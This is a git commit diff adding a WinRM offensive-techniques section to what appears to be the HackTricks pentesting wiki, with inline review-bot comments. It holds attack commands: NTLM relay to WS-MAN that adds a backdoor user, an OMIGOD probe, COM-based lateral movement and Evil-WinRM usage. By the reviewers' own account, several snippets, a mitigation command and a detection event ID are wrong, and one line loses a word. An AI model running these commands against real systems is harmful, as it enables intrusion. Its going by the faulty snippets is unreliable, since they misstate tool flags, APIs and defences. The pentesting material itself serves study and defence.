Add content from: Research Update: Enhanced src/network-services-pentesting/59...

This commit is contained in:
HackTricks News Bot 2025-08-13 01:45:46 +00:00
parent 30fa8082d2
commit 91348afa22
2 changed files with 73 additions and 3 deletions

@ -256,8 +256,80 @@ end
- `port:5985 Microsoft-HTTPAPI`
---
## Recent Vulnerabilities & Offensive Techniques (2021-2025)
### NTLM relay directly to WinRM (WS-MAN)
Since Impacket 0.11 (May 2023) `ntlmrelayx.py` can relay captured NTLM credentials straight to a **WS-MAN**/WinRM listener. When a host still listens on **unencrypted HTTP (5985)** an attacker can combine *mitm6* (or *Responder*) to coerce authentication and obtain SYSTEM-level code-execution:
```bash
sudo ntlmrelayx.py -t wsman://10.0.0.25 --no-smb-server -smb2support \
--command "net user pwned P@ssw0rd! /add"
```
Mitigations
* Disable HTTP listeners `Set-Item WSMan:\localhost\Service\EnableCompatibilityHttpListener -Value false`
* Force HTTPS and enable Extended Protection for Authentication (EPA) on recent Windows versions.
### OMIGOD CVE-2021-38647 (Azure OMI)
Azure Linux agents use the **Open Management Infrastructure (OMI)** service which exposes the WinRM/WS-MAN API on ports **5985/5986**. A logic error allowed **unauthenticated RCE as root**:
```text
curl http://victim:5985/wsman -H 'Content-Type:text/xml' -d '<xml />'
```
Patch or remove OMI (version ≥ 1.6.8-1) and block those ports from the Internet.
### WSMan.Automation COM abuse for lateral movement
WinRM can be driven without PowerShell via the `WSMan.Automation` COM object useful on systems in Constrained-Language mode. Tools such as *SharpWSManWinRM* wrap this technique:
```powershell
$ws = New-Object -ComObject 'WSMan.Automation'
$session = $ws.CreateSession('http://srv01:5985/wsman',0,$null)
$cmdId = $session.Command('cmd.exe',@('/c','whoami'))
$session.Signal($cmdId,0)
```
The execution chain (`svchost → wmiprvse → cmd.exe`) is identical to classic PS-Remoting.
---
## Tooling updates
* **Evil-WinRM v3.x (2024)** now supports **Kerberos** (`-k` / `--spn`) and **certificate-based** authentication (`--cert-pem`/`--key-pem`), session logging (`-L`) and the ability to disable remote path completion (`-N`).
```bash
RHOST=10.0.0.25 evil-winrm -i $RHOST -u j.doe -k --spn HTTP/$RHOST
```
* **Python `pypsrp` 0.9 (2024)** offers WinRM & PS-Remoting from Linux, including CredSSP and Kerberos:
```python
from psrp.client import Client
c = Client('srv01', username='ACME\\j.doe', ssl=True)
print(c.execute_cmd('ipconfig /all').std_out.decode())
```
* **Detection** monitor the **Microsoft-Windows-WinRM/Operational** log:
* Event 91 / 163 shell created
* Event 182 authentication failure
* In the Security log event 4262 records the source IP (added July 2022 CUs).
Collect these centrally and alert on anonymous or external IPs.
---
## Shodan
- `port:5985 Microsoft-HTTPAPI`
## References
- [https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm/](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm/)
- [https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/](https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/)
- [https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure](https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure)
- [https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm/](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm/)
## HackTricks Automatic Commands
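Review bot: the `WSMan.Automation` block under "WSMan.Automation COM abuse" calls `$session.Command(...)` and `$session.Signal(...)`, which the COM Session object does not expose; its methods are Create, Invoke, Get, Put, Enumerate, Delete and Identify, and the bohops post listed in References drives a cmd shell by calling `Create` on the shell resource URI and then `Invoke` with the `Command`, `Receive` and `Signal` actions, so the snippet should follow that flow or be dropped. Several other additions in this hunk need correcting before merge: the Evil-WinRM example passes `-k --spn HTTP/$RHOST`, but `-k` is Evil-WinRM's `--priv-key` option (paired with `-c/--pub-key` for certificate auth), Kerberos is selected with `-r/--realm` plus the optional `--spn` service prefix, and `--cert-pem`/`--key-pem` are not flags the tool accepts, so the command as written would be parsed as a private-key path; the pypsrp example imports `psrp.client`, whereas pypsrp's client is `pypsrp.client.Client`, it needs a password or other credential, and `execute_cmd` returns a `(stdout, stderr, rc)` tuple of strings rather than an object with a `std_out` attribute; the NTLM-relay mitigation `Set-Item WSMan:\localhost\Service\EnableCompatibilityHttpListener -Value false` only disables the port-80 compatibility listener, not the 5985 listener the paragraph is about, which is removed with `winrm delete winrm/config/listener?Address=*+Transport=HTTP` (or the matching item under `WSMan:\localhost\Listener`); the OMIGOD `curl` line posts an empty `<xml />` body and does not show the unauthenticated request the text describes, so either quote the request from the Wiz write-up or present the line as a reachability check only; the detection bullet cites Security event 4262 and WinRM/Operational events 91, 163 and 182 without a source, and 4262 is not a Security-log event ID I can find, so please add the KB reference or use the documented IDs. Finally the hunk duplicates both the Shodan section (`port:5985 Microsoft-HTTPAPI` appears at the top and again under a second `## Shodan` heading) and the ropnop link in References, so drop the second copies.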
@ -304,4 +376,3 @@ Entry_2:
{{#include ../banners/hacktricks-training.md}}

@ -48,7 +48,7 @@ Yes, you can, but **don't forget to mention the specific link(s)** where the con
> [!TIP]
>
> - **How can I cite a page of HackTricks?**
> - **How can I a page of HackTricks?**
As long as the link **of** the page(s) where you took the information from appears it's enough.\
If you need a bibtex you can use something like:
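Review bot: the replaced line in the TIP block loses the word "cite": if `> - **How can I a page of HackTricks?**` is the new version, it is ungrammatical and the original `How can I cite a page of HackTricks?` should be restored. This file is also unrelated to the WinRM research update the commit message describes, so the change should not ride along in this commit.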
@ -144,4 +144,3 @@ This license does not grant any trademark or branding rights in relation to the
{{#include ../banners/hacktricks-training.md}}